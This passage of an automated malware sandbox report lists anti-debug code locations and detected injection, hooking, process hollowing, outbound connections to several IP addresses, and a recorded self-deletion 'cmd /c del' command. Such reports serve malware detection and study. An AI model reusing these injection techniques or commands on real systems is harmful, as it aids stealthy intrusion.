          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03704F2E mov eax, dword ptr fs:[00000030h]9_2_03704F2E
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372F716 mov eax, dword ptr fs:[00000030h]9_2_0372F716
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379FF10 mov eax, dword ptr fs:[00000030h]9_2_0379FF10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379FF10 mov eax, dword ptr fs:[00000030h]9_2_0379FF10
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D070D mov eax, dword ptr fs:[00000030h]9_2_037D070D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D070D mov eax, dword ptr fs:[00000030h]9_2_037D070D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A70E mov eax, dword ptr fs:[00000030h]9_2_0373A70E
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A70E mov eax, dword ptr fs:[00000030h]9_2_0373A70E
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037437F5 mov eax, dword ptr fs:[00000030h]9_2_037437F5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03718794 mov eax, dword ptr fs:[00000030h]9_2_03718794
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787794 mov eax, dword ptr fs:[00000030h]9_2_03787794
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787794 mov eax, dword ptr fs:[00000030h]9_2_03787794
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03787794 mov eax, dword ptr fs:[00000030h]9_2_03787794
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]9_2_0372AE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]9_2_0372AE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]9_2_0372AE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]9_2_0372AE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372AE73 mov eax, dword ptr fs:[00000030h]9_2_0372AE73
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371766D mov eax, dword ptr fs:[00000030h]9_2_0371766D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]9_2_03717E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]9_2_03717E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]9_2_03717E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]9_2_03717E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]9_2_03717E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03717E41 mov eax, dword ptr fs:[00000030h]9_2_03717E41
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CAE44 mov eax, dword ptr fs:[00000030h]9_2_037CAE44
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CAE44 mov eax, dword ptr fs:[00000030h]9_2_037CAE44
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037BFE3F mov eax, dword ptr fs:[00000030h]9_2_037BFE3F
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370E620 mov eax, dword ptr fs:[00000030h]9_2_0370E620
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A61C mov eax, dword ptr fs:[00000030h]9_2_0373A61C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A61C mov eax, dword ptr fs:[00000030h]9_2_0373A61C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370C600 mov eax, dword ptr fs:[00000030h]9_2_0370C600
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370C600 mov eax, dword ptr fs:[00000030h]9_2_0370C600
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370C600 mov eax, dword ptr fs:[00000030h]9_2_0370C600
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03738E00 mov eax, dword ptr fs:[00000030h]9_2_03738E00
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1608 mov eax, dword ptr fs:[00000030h]9_2_037C1608
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037316E0 mov ecx, dword ptr fs:[00000030h]9_2_037316E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037176E2 mov eax, dword ptr fs:[00000030h]9_2_037176E2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D8ED6 mov eax, dword ptr fs:[00000030h]9_2_037D8ED6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03748EC7 mov eax, dword ptr fs:[00000030h]9_2_03748EC7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037BFEC0 mov eax, dword ptr fs:[00000030h]9_2_037BFEC0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037336CC mov eax, dword ptr fs:[00000030h]9_2_037336CC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D0EA5 mov eax, dword ptr fs:[00000030h]9_2_037D0EA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D0EA5 mov eax, dword ptr fs:[00000030h]9_2_037D0EA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D0EA5 mov eax, dword ptr fs:[00000030h]9_2_037D0EA5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037846A7 mov eax, dword ptr fs:[00000030h]9_2_037846A7
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379FE87 mov eax, dword ptr fs:[00000030h]9_2_0379FE87
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372C577 mov eax, dword ptr fs:[00000030h]9_2_0372C577
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372C577 mov eax, dword ptr fs:[00000030h]9_2_0372C577
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03727D50 mov eax, dword ptr fs:[00000030h]9_2_03727D50
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03743D43 mov eax, dword ptr fs:[00000030h]9_2_03743D43
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03783540 mov eax, dword ptr fs:[00000030h]9_2_03783540
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037B3D40 mov eax, dword ptr fs:[00000030h]9_2_037B3D40
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0370AD30 mov eax, dword ptr fs:[00000030h]9_2_0370AD30
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03713D34 mov eax, dword ptr fs:[00000030h]9_2_03713D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CE539 mov eax, dword ptr fs:[00000030h]9_2_037CE539
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03734D3B mov eax, dword ptr fs:[00000030h]9_2_03734D3B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03734D3B mov eax, dword ptr fs:[00000030h]9_2_03734D3B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03734D3B mov eax, dword ptr fs:[00000030h]9_2_03734D3B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D8D34 mov eax, dword ptr fs:[00000030h]9_2_037D8D34
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0378A537 mov eax, dword ptr fs:[00000030h]9_2_0378A537
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037B8DF1 mov eax, dword ptr fs:[00000030h]9_2_037B8DF1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371D5E0 mov eax, dword ptr fs:[00000030h]9_2_0371D5E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371D5E0 mov eax, dword ptr fs:[00000030h]9_2_0371D5E0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]9_2_037CFDE2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]9_2_037CFDE2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]9_2_037CFDE2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037CFDE2 mov eax, dword ptr fs:[00000030h]9_2_037CFDE2
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]9_2_03786DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]9_2_03786DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]9_2_03786DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov ecx, dword ptr fs:[00000030h]9_2_03786DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]9_2_03786DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786DC9 mov eax, dword ptr fs:[00000030h]9_2_03786DC9
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03731DB5 mov eax, dword ptr fs:[00000030h]9_2_03731DB5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03731DB5 mov eax, dword ptr fs:[00000030h]9_2_03731DB5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03731DB5 mov eax, dword ptr fs:[00000030h]9_2_03731DB5
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D05AC mov eax, dword ptr fs:[00000030h]9_2_037D05AC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D05AC mov eax, dword ptr fs:[00000030h]9_2_037D05AC
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037335A1 mov eax, dword ptr fs:[00000030h]9_2_037335A1
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373FD9B mov eax, dword ptr fs:[00000030h]9_2_0373FD9B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373FD9B mov eax, dword ptr fs:[00000030h]9_2_0373FD9B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]9_2_03732581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]9_2_03732581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]9_2_03732581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03732581 mov eax, dword ptr fs:[00000030h]9_2_03732581
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]9_2_03702D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]9_2_03702D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]9_2_03702D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]9_2_03702D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03702D8A mov eax, dword ptr fs:[00000030h]9_2_03702D8A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]9_2_037C2D82
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]9_2_037C2D82
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]9_2_037C2D82
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]9_2_037C2D82
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]9_2_037C2D82
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]9_2_037C2D82
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C2D82 mov eax, dword ptr fs:[00000030h]9_2_037C2D82
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]9_2_0372B477
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]9_2_0372B477
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]9_2_0372B477
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]9_2_0372B477
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]9_2_0372B477
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]9_2_0372B477
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]9_2_0372B477
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]9_2_0372B477
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]9_2_0372B477
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]9_2_0372B477
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]9_2_0372B477
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372B477 mov eax, dword ptr fs:[00000030h]9_2_0372B477
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]9_2_0373AC7B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]9_2_0373AC7B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]9_2_0373AC7B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]9_2_0373AC7B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]9_2_0373AC7B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]9_2_0373AC7B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]9_2_0373AC7B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]9_2_0373AC7B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]9_2_0373AC7B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]9_2_0373AC7B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373AC7B mov eax, dword ptr fs:[00000030h]9_2_0373AC7B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0372746D mov eax, dword ptr fs:[00000030h]9_2_0372746D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379C450 mov eax, dword ptr fs:[00000030h]9_2_0379C450
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0379C450 mov eax, dword ptr fs:[00000030h]9_2_0379C450
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373A44B mov eax, dword ptr fs:[00000030h]9_2_0373A44B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0373BC2C mov eax, dword ptr fs:[00000030h]9_2_0373BC2C
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D740D mov eax, dword ptr fs:[00000030h]9_2_037D740D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D740D mov eax, dword ptr fs:[00000030h]9_2_037D740D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D740D mov eax, dword ptr fs:[00000030h]9_2_037D740D
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h]9_2_03786C0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h]9_2_03786C0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h]9_2_03786C0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786C0A mov eax, dword ptr fs:[00000030h]9_2_03786C0A
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]9_2_037C1C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]9_2_037C1C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]9_2_037C1C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]9_2_037C1C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]9_2_037C1C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]9_2_037C1C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]9_2_037C1C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]9_2_037C1C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]9_2_037C1C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]9_2_037C1C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]9_2_037C1C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]9_2_037C1C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]9_2_037C1C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C1C06 mov eax, dword ptr fs:[00000030h]9_2_037C1C06
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C14FB mov eax, dword ptr fs:[00000030h]9_2_037C14FB
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786CF0 mov eax, dword ptr fs:[00000030h]9_2_03786CF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786CF0 mov eax, dword ptr fs:[00000030h]9_2_03786CF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_03786CF0 mov eax, dword ptr fs:[00000030h]9_2_03786CF0
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037D8CD6 mov eax, dword ptr fs:[00000030h]9_2_037D8CD6
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_0371849B mov eax, dword ptr fs:[00000030h]9_2_0371849B
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]9_2_037C4496
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]9_2_037C4496
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]9_2_037C4496
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]9_2_037C4496
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]9_2_037C4496
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]9_2_037C4496
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]9_2_037C4496
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]9_2_037C4496
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]9_2_037C4496
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]9_2_037C4496
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]9_2_037C4496
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]9_2_037C4496
          Source: C:\Windows\SysWOW64\netsh.exeCode function: 9_2_037C4496 mov eax, dword ptr fs:[00000030h]9_2_037C4496
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10002EDC GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__calloc_crt,__decode_pointer,GetCurrentThreadId,__freeptd,1_2_10002EDC
          Source: C:\Windows\SysWOW64\cmd.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10004CBC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_10004CBC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10002ECD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_10002ECD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_10007786 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_10007786

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 75.126.100.11 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 192.0.78.24 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 95.215.210.10 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 165.227.229.15 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.88.85.105 80Jump to behavior
          Hijacks the control flow in another processShow sources
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 77165050 value: E9Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 771650F0 value: E9Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 77165180 value: E9Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 77165190 value: E9Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 771651A0 value: E9Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 7717FEE0 value: E9Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 771133C0 value: E9Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 77114760 value: E9Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 770D6590 value: E9Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 770DB510 value: E9Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 770FC490 value: E9Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 7711EE00 value: E9Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 6360 base: 7711EFD0 value: E9Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 3424Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeThread register set: target process: 3424Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\cmd.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\SysWOW64\cmd.exeSection unmapped: C:\Windows\SysWOW64\netsh.exe base address: 9F0000Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exeJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'Jump to behavior
          Source: explorer.exe, 00000004.00000002.914158425.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.692738305.0000000001080000.00000002.00000001.sdmp, netsh.exe, 00000009.00000002.915341297.0000000005E00000.00000002.00000001.sdmpBinary or memory string: Progmanlock
